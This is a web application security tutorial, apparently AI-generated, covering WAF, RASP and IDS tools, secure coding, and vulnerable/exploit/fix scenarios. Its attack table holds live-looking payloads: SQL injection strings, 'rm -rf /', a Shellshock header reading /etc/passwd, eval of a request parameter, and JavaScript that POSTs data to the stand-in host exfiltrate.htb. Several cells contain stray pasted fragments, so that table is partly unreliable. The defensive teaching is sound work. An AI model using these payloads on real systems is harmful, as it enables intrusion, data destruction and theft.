4. Web Application Server Security- Defending Against Attacks
1. Introduction to Web Application Servers
Web application servers process user requests, execute business logic, and interact with databases and other backend components. However, they are also prime targets for attackers due to their exposure to the internet. Securing them requires a combination of WAF (Web Application Firewall), RASP (Runtime Application Self-Protection), Secure Coding Practices, and IDS/IPS (Intrusion Detection/Prevention Systems).
graph TD
User[User Request] -->|HTTP/HTTPS| WAF[Web Application Firewall]
WAF -->|Filtered Traffic| WAS[Web Application Server]
WAS -->|SQL Queries, API Calls| DB[Database]
WAS -->|External Requests| API[Third-Party APIs]
IDS[Intrusion Detection System] -->|Logs & Monitoring| WAS
RASP[Runtime Application Self-Protection] -->|Protects in Real-time| WAS2. Common Web Application Server Attack Tactics
| Attack Type | Description | Example Exploit |
|---|---|---|
| SQL Injection (SQLi) | Injection of malicious SQL statements to read, modify, or delete database records. | ' OR 1=1 --B: Boolean-based blind AND 1=1 E: Error-based AND GTID_SUBSET(@@version,0) U: Union query-based UNION ALL SELECT 1,@@version,3 S: Stacked queries ; DROP TABLE users T: Time-based blind AND 1=IF(2>1,SLEEP(5),0) Q: Inline queries SELECT (SELECT @@version) from SQLI Flow 2.1 SQLMAP regex regex for sqli Setting up Debugger/logger for Debugger-Maria Logger - mysql Logger - SQLite Logger - MongoDB Logger - PostgreSQL Logger - MS SQL Server Logger - Oracle Database |
| Cross-Site Scripting (XSS) | Injecting malicious JavaScript into webpages to steal user sessions or perform actions. | <script>alert(1)</script>Three Types Reflective Stored DOM-based Javascript, Nodejs, Express, Webpack Common Dangerous functions | eval()|| setTimeout()|| setInterval()|| Function()|| document.write()|| innerHTML|| outerHTML|| location.href|| location.replace |<br>| localStorage|<br>| sessionStorage|<br>| XMLHttpRequest|<br>| fetch()`| |
| Server-Side Request Forgery (SSRF) | Abuse server functionality to perform internal or external resource requests on behalf of the server | curl -X GET "http://localhost/admin"SSRF Basic |
| Cross-Site Request Forgery (CSRF) | Tricking users into executing unauthorized actions on a website where they are authenticated. | <img src="http://target.com/delete?user=admin">CSRF javascript payload session riding - CSRF Use XMLHttpRequest and Fetch API to send HTTP requests from javascript code. XMLHTTPREQUEST js<br>var xhr = new XMLHttpRequest();<br>xhr.open('POST', 'http://exfiltrate.htb/', false);<br>xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');<br>xhr.send('param1=hello¶m2=world');<br>Fetch API js<br>const response = await fetch('http://exfiltrate.htb/', {<br> method: "POST",<br> headers: {<br> 'Content-Type': 'application/x-www-form-urlencoded'<br> },<br> body: 'param1=hello¶m2=world',<br> });<br>Tools: https://csrf-poc-generator.vercel.app/ Burp Pro - CSRF Generator |
| Command Injection | Injecting OS commands into vulnerable input fields to gain system access. | ; rm -rf /3. Command Injection |
| Remote Code Execution (RCE) | Gaining full control of a system by executing arbitrary code on the server. | eval($_GET['cmd']);4a. RCE C Data Wrapper PHP Data Wrapper Ruby Data Wrapper Java Data Wrapper Bash Data Wrapper Javascript Data Wrapper |
| Local File Inclusion (LFI) | Exploiting improperly handled file paths to read sensitive files. | ../../../etc/passwd |
| Directory Traversal | Navigating beyond the intended directory structure to access restricted files. | GET /../../etc/passwd |
| Log Forging | Manipulating application logs to hide attack traces or execute log-based exploits. | "; DROP TABLE users; -- |
| User-Agent Spoofing | Changing the User-Agent header to evade detection or exploit vulnerabilities. |
User-Agent: () { :; }; /bin/bash -c 'cat /etc/passwd' |
3. Web Application Firewall (WAF) & Runtime Protection
🔥 WAF: Protecting Web Servers from Exploits
A Web Application Firewall (WAF) inspects HTTP traffic and blocks malicious payloads before they reach the server.
WAF Rules to Mitigate Attacks:
| Attack Type | Example WAF Rule |
|---|---|
| SQL Injection | Block ' OR 1=1 -- in URL parameters |
| XSS | Block tags in user input |
| LFI | Block "../../../../" in requests |
| SSRF | Restrict server-side requests to internal services |
🔥 RASP: Runtime Protection
Runtime Application Self-Protection (RASP) detects and prevents attacks within the application by monitoring real-time execution.
RASP Capabilities:
- Blocks unauthorized command execution
- Prevents memory corruption exploits
- Monitors unexpected API calls
4. Intrusion Detection & Prevention (IDS/IPS)
| Tool | Purpose |
|---|---|
| Snort | Detects suspicious traffic patterns |
| Suricata | High-performance network IDS/IPS |
| OSSEC | Host-based IDS for web servers |
| ModSecurity | Open-source WAF for Apache, Nginx, and IIS |
5. Secure Coding Practices
| Security Practice | Implementation |
|---|---|
| Input Validation | Validate user input to prevent SQLi, XSS, and LFI. |
| Least Privilege | Restrict database and OS permissions to minimize attack impact. |
| Escaping Output | Prevent XSS by escaping HTML, JavaScript, and CSS. |
| Secure Headers | Use Content Security Policy (CSP), X-Frame-Options, X-XSS-Protection headers. |
| Use Parameterized Queries | Prevent SQLi with prepared statements (e.g., mysqli_prepare()). |
| Implement CSRF Protection | Use CSRF tokens in forms and API requests. |
6. Attack Detection & Response
| Attack Type | Detection Method | Mitigation Strategy |
|---|---|---|
| SQL Injection | Monitor database logs for unexpected queries. | Use WAF & input validation. |
| XSS | Check for unexpected JavaScript execution in logs. | Enable CSP & sanitize input. |
| SSRF | Detect internal network requests from web app. | Restrict server requests with allowlists. |
| CSRF | Monitor unauthorized form submissions. | Use CSRF tokens & SameSite cookies. |
| Command Injection | Look for unexpected shell commands in logs. | Implement input sanitization & use RASP. |
7. Web Application Server Security Tools
| Tool | Purpose |
|---|---|
| ModSecurity | Open-source WAF for Apache, Nginx, IIS |
| Burp Suite | Detects SQLi, XSS, SSRF vulnerabilities |
| OWASP ZAP | Automated web vulnerability scanner |
| SQLmap | Automated SQL Injection tool |
| Nikto | Scans web servers for vulnerabilities |
| Metasploit | Exploit known vulnerabilities for testing |
| Fail2Ban | Bans IP addresses after multiple failed logins |
8. Web Application Attack Scenarios
Scenario 1: SQL Injection Exploiting Poor Input Validation
Vulnerable Query:
SELECT * FROM users WHERE username = '$user' AND password = '$pass';
Exploit:
' OR '1'='1' --
Fix:
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$user, $pass]);
Scenario 2: XSS via Unsanitized User Input
Vulnerable Code:
<input type="text" name="comment" value="<?php echo $_GET['comment']; ?>">
Exploit:
<script>alert('XSS!')</script>
Fix:
echo htmlspecialchars($_GET['comment'], ENT_QUOTES, 'UTF-8');
Scenario 3: SSRF Exploiting Open URL Requests
Vulnerable Code:
$url = $_GET['url'];
$response = file_get_contents($url);
Exploit:
http://localhost/admin
Fix:
$allowed_domains = ['example.com'];
if (!in_array(parse_url($url, PHP_URL_HOST), $allowed_domains)) {
die('Invalid request');
}
9. Final Thoughts & Best Practices
🔹 Web application servers are a prime attack surface, requiring multiple layers of security.
🔹 Combining WAF, RASP, secure coding, and IDS/IPS helps prevent common web attacks.
🔹 Proactive monitoring, secure configurations, and strong authentication policies are key to defense.
Would you like a hands-on demo for any of these attacks? 🚀